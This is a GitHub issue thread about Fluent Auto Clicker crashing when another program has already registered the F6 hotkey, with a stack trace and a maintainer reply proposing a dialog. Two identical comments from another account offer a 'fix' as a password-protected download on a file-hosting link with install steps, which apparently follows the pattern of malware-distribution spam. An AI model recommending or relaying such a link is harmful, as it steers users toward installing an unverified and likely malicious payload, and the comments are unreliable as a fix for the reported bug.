### ISSUE TITLE
Crashes after another program registers the same hotkey

### ISSUE THREAD

**Issue by RyanLua** [RyanLua/FluentAutoClicker#31]
### Description

When another program registers the default <kbd>F6</kbd> hotkey, Fluent Auto Clicker will crash because it is not handled.

### What was expected?

No crash to occur if another program uses a hotkey.

### What actually happened?

A crash occurred.

### Steps to reproduce

1. Open another program that uses the F6 hotkey like OP Auto Clicker
2. Open Fluent Auto Clicker
3. The app crashes immediately

### Relevant log output

```shell
System.ComponentModel.Win32Exception
  HResult=0x80004005
  Message=Hot key is already registered.
  Source=Fluent Auto Clicker
  StackTrace:
   at FluentAutoClicker.MainPage.MainPage_Loaded(Object sender, RoutedEventArgs e) in C:\Users\ryanl\source\repos\FluentAutoClicker\FluentAutoClicker\MainPage.xaml.cs:line 42
   at WinRT._EventSource_global__Microsoft_UI_Xaml_RoutedEventHandler.EventState.<GetEventInvoke>b__1_0(Object sender, RoutedEventArgs e)
   at ABI.Microsoft.UI.Xaml.RoutedEventHandler.Do_Abi_Invoke(IntPtr thisPtr, IntPtr sender, IntPtr e)
```

### Code of Conduct

- [X] I have read and agree to the project's [Code of Conduct](https://github.com/RyanLua/FluentAutoClicker?tab=coc-ov-file)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by RyanLua** [comment]
Ideally we use a [content dialog](https://learn.microsoft.com/en-us/windows/apps/design/controls/dialogs-and-flyouts/dialogs) to just inform the user that the hotkey isn't available.
